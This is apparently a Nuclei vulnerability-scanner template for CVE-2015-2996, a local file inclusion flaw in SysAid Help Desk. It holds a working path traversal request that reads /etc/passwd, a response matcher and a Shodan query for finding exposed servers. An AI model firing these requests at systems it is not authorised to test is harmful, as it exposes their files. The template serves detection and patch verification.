id: CVE-2015-2996 info: name: SysAid Help Desk <15.2 - Local File Inclusion author: 0x_Akoko severity: high description: | SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum. remediation: | Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Jun/8 - https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk - http://seclists.org/fulldisclosure/2015/Jun/8 - https://nvd.nist.gov/vuln/detail/CVE-2015-2996 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C cvss-score: 8.5 cve-id: CVE-2015-2996 cwe-id: CWE-22 epss-score: 0.77754 epss-percentile: 0.97881 cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 tags: cve,cve2015,sysaid,lfi,seclists http: - method: GET path: - "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" - "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd" stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - type: status status: - 200 # digest: 490a00463044022039866141efebf8976386f75cf34c13e5ff3ebc642e7b1c39cf494f2cf5ef7f16022021dedc6a292450f532c554cf4411ed2a436e219dd2f0add43d0ef92bb748b12c:922c64590222798bb761d5b6d8e72950